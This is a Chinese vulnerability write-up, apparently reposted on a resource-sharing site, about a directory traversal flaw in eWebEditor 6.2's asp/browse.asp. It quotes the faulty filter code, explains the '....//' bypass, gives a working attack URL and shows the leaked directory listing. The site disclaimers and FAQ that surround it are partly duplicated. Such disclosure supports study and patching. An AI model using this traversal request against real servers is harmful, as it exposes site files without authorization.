eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
也想出现在这里?
联系我们吧
asp/browse.asp部分源码:
复制代码
代码如下:
Dim s_ReturnFlag, s_FolderType, s_Dir Dim s_CurrDir s_ReturnFlag = Trim(Request.QueryString(\”returnflag\”)) s_FolderType = Trim(Request.QueryString(\”foldertype\”)) s_Dir = Trim(Request(\”dir\”)) Select Case s_FolderType Case \”upload\” s_CurrDir = sUploadDir Case \”shareimage\” sAllowExt = \”\” s_CurrDir = sPathShareImage Case \”shareflash\” sAllowExt = \”\” s_CurrDir = sPathShareFlash Case \”sharemedia\” sAllowExt = \”\” s_CurrDir = sPathShareMedia Case Else s_FolderType = \”shareother\” sAllowExt = \”\” s_CurrDir = sPathShareOther End Select s_Dir = Replace(s_Dir, \”\\\”, \”/\”) \’下面两行是对目录跳转的处理,漏洞存在于此处 s_Dir = Replace(s_Dir, \”../\”, \”\”) \’替换../为空 s_Dir = Replace(s_Dir, \”./\”, \”\”) \’替换./为空 If Left(s_Dir,1)=\”/\” Then s_Dir = \”\” End If Dim s_Dir2 s_Dir2 = Replace(s_Dir, \”/\”, \”\\\”) If s_Dir <> \”\” Then If CheckValidDir(s_CurrDir & s_Dir2) = True Then s_CurrDir = s_CurrDir & s_Dir2 Else s_Dir = \”\” End If End If
代码对../和./进行过滤用来防止目录跳转,但可以通过构造参数饶过检测.由于检测替换只进行一次可以使用….//代替上级目录,程序替换后….//变成../ 攻击代码示例: http://localhost/asp/browse.asp?action=file&type=file&dir=…..///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload 跳转到上eWebEditor的DiaLog目录,查看返回页面的源文件:
复制代码
代码如下:
<HTML><HEAD><meta http-equiv=\’Content-Type\’ content=\’text/html; charset=gb2312\’><TITLE>eWebEditor</TITLE></head><body><script language=javascript>var arr = new Array(); arr[0]=new Array(\”about.htm\”, \”1.85 KB\”,\”2009-05-29 16:27:06\”); arr[1]=new Array(\”anchor.htm\”, \”3.68 KB\”,\”2009-05-13 16:39:40\”); arr[2]=new Array(\”art.htm\”, \”49.55 KB\”,\”2009-05-13 16:39:40\”); arr[3]=new Array(\”backimage.htm\”, \”9.46 KB\”,\”2009-05-13 16:39:42\”); arr[4]=new Array(\”browse.htm\”, \”20.74 KB\”,\”2009-05-13 16:39:42\”); arr[5]=new Array(\”dialog.js\”, \”6.44 KB\”,\”2009-05-13 22:39:08\”); arr[6]=new Array(\”emot.htm\”, \”3.26 KB\”,\”2009-05-13 16:39:42\”); arr[7]=new Array(\”EQ.htm\”, \”3.48 KB\”,\”2009-05-14 00:02:20\”); arr[8]=new Array(\”eWebEditorActiveX.CAB\”, \”1118.08 KB\”,\”2009-05-14 00:18:40\”); arr[9]=new Array(\”eWebEditorActiveXInstall.exe\”, \”1190.72 KB\”,\”2009-04-11 23:12:48\”); arr[10]=new Array(\”fieldset.htm\”, \”4.11 KB\”,\”2009-05-13 16:39:42\”); arr[11]=new Array(\”file.htm\”, \”5.52 KB\”,\”2009-05-13 16:39:42\”); arr[12]=new Array(\”findreplace.htm\”, \”2.82 KB\”,\”2009-05-13 16:39:42\”); arr[13]=new Array(\”flash.htm\”, \”14.43 KB\”,\”2009-05-13 16:39:42\”); arr[14]=new Array(\”fullscreen.htm\”, \”0.84 KB\”,\”2009-05-13 16:39:42\”); arr[15]=new Array(\”hyperlink.htm\”, \”4.43 KB\”,\”2009-05-13 16:39:42\”); arr[16]=new Array(\”iFrame.htm\”, \”4.24 KB\”,\”2009-05-14 00:31:30\”); arr[17]=new Array(\”img.htm\”, \”13.25 KB\”,\”2009-05-13 16:39:42\”); arr[18]=new Array(\”importexcel.htm\”, \”5.87 KB\”,\”2009-05-13 16:39:42\”); arr[19]=new Array(\”importword.htm\”, \”8.44 KB\”,\”2009-05-13 16:39:42\”); arr[20]=new Array(\”installactivex.htm\”, \”2.02 KB\”,\”2009-05-13 16:39:42\”); arr[21]=new Array(\”i_upload.htm\”, \”7.95 KB\”,\”2009-05-13 22:41:40\”); arr[22]=new Array(\”map.htm\”, \”4.13 KB\”,\”2009-05-13 16:39:42\”); arr[23]=new Array(\”marquee.htm\”, \”2.44 KB\”,\”2009-05-13 16:39:42\”); arr[24]=new Array(\”media.htm\”, \”5.07 KB\”,\”2009-05-13 16:39:42\”); arr[25]=new Array(\”owcexcel.htm\”, \”2.64 KB\”,\”2009-05-13 16:39:42\”); arr[26]=new Array(\”paragraph.htm\”, \”5.95 KB\”,\”2009-05-13 16:39:42\”); arr[27]=new Array(\”paste.htm\”, \”4.50 KB\”,\”2009-05-13 16:39:42\”); arr[28]=new Array(\”quickformat.htm\”, \”13.58 KB\”,\”2009-05-13 16:39:42\”); arr[29]=new Array(\”selcolor.htm\”, \”14.93 KB\”,\”2009-05-13 16:39:42\”); arr[30]=new Array(\”symbol.htm\”, \”14.61 KB\”,\”2009-05-13 16:39:42\”); arr[31]=new Array(\”table.htm\”, \”11.71 KB\”,\”2009-05-13 16:39:42\”); arr[32]=new Array(\”tablecell.htm\”, \”7.98 KB\”,\”2009-05-13 16:39:42\”); arr[33]=new Array(\”tablecellsplit.htm\”, \”2.55 KB\”,\”2009-05-13 16:39:42\”); arr[34]=new Array(\”template.htm\”, \”4.50 KB\”,\”2009-05-13 16:39:42\”); arr[35]=new Array(\”WebEQInstall.cab\”, \”1123.39 KB\”,\”2009-05-14 00:16:16\”); parent.setFileList(\’span_upload\’, \’upload\’, \’../DiaLog\’, arr);</script></body></html>
1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
